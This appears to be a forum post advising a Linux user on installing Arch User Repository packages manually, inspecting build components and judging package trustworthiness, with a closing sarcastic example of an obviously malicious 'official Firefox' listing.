Do you know how to install without a helper? Go through the wiki and build the package for a couple apps and then uninstall if you like. I don’t know everything that’s going on, but I can somewhat tell if it doesn’t seem crazy. If you get a component that looks strange, just look it up on the AUR or official repos.

Yes, there’s more risk in the AUR than “official”, but the AUR is one of the greatest parts of arch. I’d the app you’re installing seems active with comments and users, I bet you’re fine.

There’s a lot of people out there doing this waaaaay smarter than me. If it got past all of them too, then I probably never stood a chance to avoid whatever it was. I also understand malware on the AUR to be very uncommon. I happened 1x in something like the last 5-10 years and was discovered and down in under day. (I could be remembering wrong).

I’d also say think a bit. If you find “the official Firefox” first posted today with no comments and a link to some Eastern European language wish-looking version of Git….i mean download that shit. Add to root users group and save the password! * if you don’t know where the last part got sketchy and sarcastic, you may want an os with more guardrails.